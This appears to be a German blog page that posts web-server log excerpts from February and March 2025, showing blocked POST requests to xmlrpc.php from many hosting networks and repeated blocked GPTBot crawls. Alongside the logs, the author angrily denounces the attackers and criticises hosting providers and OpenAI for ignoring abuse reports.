107.180.118.40 website*1.com – – [03/Mar/2025:06:21:15 +0100] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*1.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3) AppleWebKit/614.31.14 (KHTML, like Gecko) Version/17.0.96 Safari/614.31.14“
132.148.182.32 website*1.com – – [03/Mar/2025:06:46:39 +0100] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*1.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Edg/112.0.1722.68“
107.180.112.121 website*1.com – – [03/Mar/2025:06:59:27 +0100] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*1.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:129.0) Gecko/20100101 Firefox/129.0“
184.168.114.28 website*1.com – – [03/Mar/2025:02:08:58 +0100] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*1.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36“
AS37963 – Hangzhou Alibaba Advertising Co.,Ltd.
47.119.16.237 website*1.com – – [03/Mar/2025:02:22:24 +0100] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*1.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5) AppleWebKit/618.3.5 (KHTML, like Gecko) Version/17.4 Safari/618.3.5“

AS63949 – Akamai Connected Cloud
2600:3c03::f03c:92ff:fee8:1f55 website*1.com – – [03/Mar/2025:05:54:18 +0100] „POST /xmlrpc.php HTTP/1.0“ 403 – „Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0“

AS64458 – Mizban Dade Pasargad LLC
2a05:8640::13b website*1.com – – [03/Mar/2025:06:14:14 +0100] „POST /xmlrpc.php HTTP/1.0“ 403 – „Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0“
AS131366 – Lanit Technology and Communication Joint Stock Company
103.163.214.43 website*1.com – – [03/Mar/2025:06:33:52 +0100] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*1.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36“

AS40021 – Nubes, LLC
207.244.226.212 website*1.com – – [03/Mar/2025:00:33:10 +0100] „POST /xmlrpc.php HTTP/1.0“ 403 – „Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0“
207.244.226.212 website*1.com – – [03/Mar/2025:02:05:37 +0100] „POST /xmlrpc.php HTTP/1.0“ 403 – „Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0“
AS20473 – The Constant Company, LLC
207.148.74.195 website*1.com – – [03/Mar/2025:00:48:28 +0100] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*1.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36 Edg/116.0.1938.62“

AS19853 – OrangeHost
209.172.2.50 website*1.com – – [03/Mar/2025:01:15:17 +0100] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*1.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36“

AS33182 – HostDime.com, Inc.
184.171.244.225 website*1.com – – [03/Mar/2025:01:16:05 +0100] „POST /xmlrpc.php HTTP/1.0“ 403 – „Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0“

AS20454 – SECURED SERVERS LLC
66.85.140.106 website*1.com – – [03/Mar/2025:01:28:46 +0100] „POST /xmlrpc.php HTTP/1.0“ 403 „http://website*1.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36“
AS19871 – Network Solutions, LLC
162.241.70.229 website*1.com – – [03/Mar/2025:01:42:11 +0100] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*1.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:126.0) Gecko/20100101 Firefox/126.0“

AS38719 – Dreamscape Networks Limited
122.201.125.186 website*1.com – – [03/Mar/2025:01:55:35 +0100] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*1.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0“

AS140817 – ODS ONLINE DATA SOLUTION JOINT STOCK COMPANY
103.169.35.190 website*1.com – – [03/Mar/2025:02:35:41 +0100] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*1.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0“

Schauen wir mal, ob unsere Abuse-Meldungen jetzt ENDLICH ernst genommen werden!

HACKER-IDIOTEN, Zugriffsversuch über XMLRPC.PHP vom 01 März 2025:

Hier sind es nun dumme Hacking-Versuche über die xmlrpc.php! Nur zu dumm, dass dieser armseelige Hacking-Versuch nicht funktioniert, denn diese veraltete Funktion ist komplett deaktiviert!

Da AUCH HIER so einige MIT VERANTWORTLICHE PROVIDER anscheinend unsere Abuse-Mails nicht ernst nehmen, veröffentlichen wir hier nun ab März 2025 diese dummen HACKING-VERSUCHE ebenfalls so lange öffentlich, bis die hier MIT VERANTWORTLICHEN PROVIDER dies dann endlich beenden!

So geht es auch gleich los, hier die ersten Versuche aus den UNSICHEREN NETZWERKE, SERVERN und WEBSPACES! Zu Schutz des Website-Besitzers haben wir die betroffene Website in website*1 umbenannt:

AS60904 – ATC Telecom LTD.
158.255.80.210 website*1.com – – [01/Mar/2025:18:25:17 +0100] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0“

AS52368 – ZAM LTDA.
186.64.114.110 website*1.com – – [01/Mar/2025:18:46:57 +0100] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0“

AS63949 – Akamai Connected Cloud – VERY UNSECURE, BLOCKED COMPLETE
2600:3c03::f03c:92ff:fe60:4dbf website*1.com – – [01/Mar/2025:19:06:47 +0100] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0“

AS64458 – Mizban Dade Pasargad LLC
2a05:8640::13b website*1.com – – [01/Mar/2025:19:25:16 +0100] „POST /xmlrpc.php HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0“

AS45102 – Alibaba (US) Technology Co., Ltd. – VERY UNSECURE, BLOCKED COMPLETE
8.218.30.127 website*1.com – – [01/Mar/2025:20:25:14 +0100] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0“
8.218.212.177 website*1.com – – [02/Mar/2025:02:08:50 +0100] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0“

AS40819 – Liquid Web, L.L.C
173.249.147.129 website*1.com – – [01/Mar/2025:20:47:39 +0100] „POST /xmlrpc.php HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0“

AS64458 – Mizban Dade Pasargad LLC
2400:6180:100:d0::37a:2001 website*1.com – – [01/Mar/2025:21:11:24 +0100] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0“

AS26496 – GoDaddy.com, LLC – VERY UNSECURE, BLOCKED COMPLETE – ONLINE-FORMULAR FÜR ABUSE-MELDUNG EIN NOGO!
118.139.181.75 website*1.com – – [01/Mar/2025:21:36:35 +0100] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0“

AS37963 – Hangzhou Alibaba Advertising Co.,Ltd. – VERY UNSECURE, CHINA IS BLOCKED COMPLETE
101.132.97.62 website*1.com – – [01/Mar/2025:22:03:30 +0100] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Gentoo; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0“

AS26347 – New Dream Network, LLC
75.119.221.53 website*1.com – – [01/Mar/2025:22:32:15 +0100] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0“

AS48715 – Sefroyek Pardaz Engineering PJSC
185.141.134.48 website*1.com – – [01/Mar/2025:23:00:55 +0100] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0“

AS396982 – Google LLC – VERY UNSECURE, BLOCKED COMPLETE
34.146.20.135 website*1.com – – [01/Mar/2025:23:31:29 +0100] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0“

AS136052 – PT Cloud Hosting Indonesia
116.193.190.201 website*1.com – – [02/Mar/2025:00:42:21 +0100] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0“

AS55720 – Gigabit Hosting Sdn Bhd
103.205.211.78 website*1.com – – [02/Mar/2025:03:46:45 +0100] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0“

AS16276 – OVH SAS – VERY UNSECURE, BLOCKED COMPLETE – ONLINE-FORMULAR FÜR ABUSE-MELDUNG EIN NOGO!
51.89.153.66 website*1.com – – [02/Mar/2025:05:49:29 +0100] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0“

Anhand der vielen Logfiles, die wir ja regelmäßig von mehreren Website-Besitzern bekommen, melden wir VERSTÄRKT fast täglich die Hacking-Versuche an die mit verantwortlichen Provider!

Dadurch sind innerhalb von Wochen die eh wirklich dummen Hacking-Versuche drastisch zurüchgegangen!

JA, die Spielzeuge für diese Hacker-Idioten und dummen Script-Kiddies werden rar! *lol*

Diese kriminellen Hacker-Idioten und ScriptKiddies meinen nun, sie sind schlau, Haha.

Seit wir viele Hacking-Versuche fast täglich melden, werden einige dieser Hacker-Idioten vorsichtiger. Man macht das erst mal ein ganz vorsichtiges GET! Kommt da ein 403, hören sie meist auf.

NUR ZU DUMM für diese armseeligen Hacker-Idioten denn auch das melden wir nun schon seit DEZEMBER 2024!

Die Hacker Vollpfosten des Monats

Weitere Auszüge der Logs von vielen Websites in Bezug auf diese Hacker-Idioten folgen diese Tage. 😉

Tipps, wie man die Website schützen kann findest du über den Link.

Hacker Protokoll Februar 2025

Das Hacker Protokoll Februar 2025

Dieses Hacker Protokoll Februar 2025 ist nicht mehr so umfangreich, da wir ja nicht jeden Zugriff dieser Hacker-Idioten posten. Trotzdem immer wieder diese unermüdlichen Login Idioten und Amateur Hacker, die es wieder und immer wieder versuchen, trotz einem 403, eine Homepage zu hacken.

Dieses Hacker Protokoll Februar 2025 soll ebenfalls so einige Hosting-Provider und Provider für Cloud´s endlich mal wachrütteln, damit sie ENDLICH die Webspaces ihrer Kunden besser vor diesen ganzen Login- und Hacker-Müll schützen!!! Viele Mails an Abuse der jeweiligen verantwortlichen Provider wurden geschrieben. Oft kam nur Blabla aber es ändert sich absolut NICHTS!

Somit hier nun das Protokoll vom Februar. Man bedenke, die jeweiligen Tabellen sind immer nur ein ganz kleiner Auszug von dem, was da wirklich über den ganzen Tag auf den bestroffenen Websites versucht wurde. Zum Schutz der betroffenen Domains wurden diese ausgeschwärzt oder mit Stern (*) versehen.

Protokoll-Auszüge vom Februar 2025 – Was diesen Monat besonders NEGATIV auffällt:

Provider AS8075 – Microsoft Corporation glänzt durch IGNORANZ! Der BOT-BETREIBER GPTBot – openai.com/gptbot glänzt mit ARROGANZ UND IGNORANZ!

Die Antworten von support@openai.com, einfach unglaublich. OPENAI.COM stellt auch noch FORDERUNGEN, um aufzuhören!

Die Website-Besitzer bestimmen über ihre Websites und nicht dieser arrogante AI-Betreiber!

**Zum Schutz des Website-Besitzers wurde die Domain in website*1 umbenannt!**

Von AI hier auch keine Spur, nur penetrante und DUMME Versuche, Content für die AI zu klauen. Diese penetranten Versuche gingen von 02:32:12 bis 07:24:43!!!

20.171.207.194 www.website*1.de – – [24/Feb/2025:02:32:12 +0100] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)“
20.171.207.194 www.website*1.de – – [24/Feb/2025:02:32:49 +0100] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)“
20.171.207.194 www.website*1.de – – [24/Feb/2025:02:33:05 +0100] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)“
20.171.207.194 www.website*1.de – – [24/Feb/2025:02:34:32 +0100] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)“
20.171.207.194 www.website*1.de – – [24/Feb/2025:02:38:12 +0100] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)“
20.171.207.194 www.website*1.de – – [24/Feb/2025:02:38:27 +0100] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)“
20.171.207.194 www.website*1.de – – [24/Feb/2025:02:38:40 +0100] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)“
20.171.207.194 www.website*1.de – – [24/Feb/2025:02:38:54 +0100] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)“
20.171.207.194 www.website*1.de – – [24/Feb/2025:02:39:10 +0100] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)“
20.171.207.194 www.website*1.de – – [24/Feb/2025:02:39:24 +0100] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)“
20.171.207.194 www.website*1.de – – [24/Feb/2025:02:39:38 +0100] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)“
20.171.207.194 www.website*1.de – – [24/Feb/2025:02:40:07 +0100] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)“
20.171.207.194 www.website*1.de – – [24/Feb/2025:02:40:13 +0100] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)“
20.171.207.194 www.website*1.de – – [24/Feb/2025:02:40:23 +0100] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)“
20.171.207.194 www.website*1.de – – [24/Feb/2025:02:40:39 +0100] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)“
20.171.207.194 www.website*1.de – – [24/Feb/2025:02:41:21 +0100] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)“
20.171.207.194 www.website*1.de – – [24/Feb/2025:02:43:22 +0100] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)“
20.171.207.194 www.website*1.de – – [24/Feb/2025:02:43:28 +0100] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)“
20.171.207.194 www.website*1.de – – [24/Feb/2025:02:43:43 +0100] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)“
20.171.207.194 www.website*1.de – – [24/Feb/2025:02:43:52 +0100] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)“
20.171.207.194 www.website*1.de – – [24/Feb/2025:02:44:12 +0100] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)“
20.171.207.194 www.website*1.de – – [24/Feb/2025:02:44:44 +0100] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)“
20.171.207.194 www.website*1.de – – [24/Feb/2025:02:45:12 +0100] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)“
20.171.207.194 www.website*1.de – – [24/Feb/2025:02:45:33 +0100] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)“
20.171.207.194 www.website*1.de – – [24/Feb/2025:02:45:59 +0100] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)“
20.171.207.194 www.website*1.de – – [24/Feb/2025:02:47:27 +0100] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)“
20.171.207.194 www.website*1.de – – [24/Feb/2025:02:53:40 +0100] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)“
20.171.207.194 www.website*1.de – – [24/Feb/2025:02:55:33 +0100] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)“
20.171.207.194 www.website*1.de – – [24/Feb/2025:02:56:53 +0100] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)“

usw…. usw… DAS GANZE GING DANN BIS 07:24:43 +0100!!!

20.171.207.194 www.website*1.de – – [24/Feb/2025:07:24:43 +0100] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)“

Neuerdings sind so einige Hacker-Idioten eh schon vorsichtiger geworden. Haha, da wird nur ein vorsichtiges GET / gemacht, kommt ein 403, ziehen sie weiter. NUR ZU DUMM für diese Hacker-Idioten denn auch dies wird SOFORT an den verantwortlichen Provider gemeldet!

Anhand der vielen Logfiles, die wir ja regelmäßig von mehreren Website-Besitzern bekommen, melden wir VERSTÄRKT fast täglich die Hacking-Versuche an die mit verantwortlichen Provider!

Dadurch sind innerhalb von Wochen die eh wirklich dummen Hacking-Versuche drastisch zurüchgegangen!

JA, die Spielzeuge für diese Hacker-Idioten und dummen Script-Kiddies werden rar! *lol*

Diese kriminellen Hacker-Idioten und ScriptKiddies meinen nun, sie sind schlau, Haha.

Seit wir viele Hacking-Versuche fast täglich melden, werden einige dieser Hacker-Idioten vorsichtiger. Man macht das erst mal ein ganz vorsichtiges GET! Kommt da ein 403, hören sie meist auf.

NUR ZU DUMM für diese armseeligen Hacker-Idioten denn auch das melden wir nun schon seit DEZEMBER 2024!

Die Hacker Vollpfosten des Monats

Weitere Auszüge der Logs von vielen Websites in Bezug auf diese Hacker-Idioten folgen diese Tage. 😉

Tipps, wie man die Website schützen kann findest du über den Link.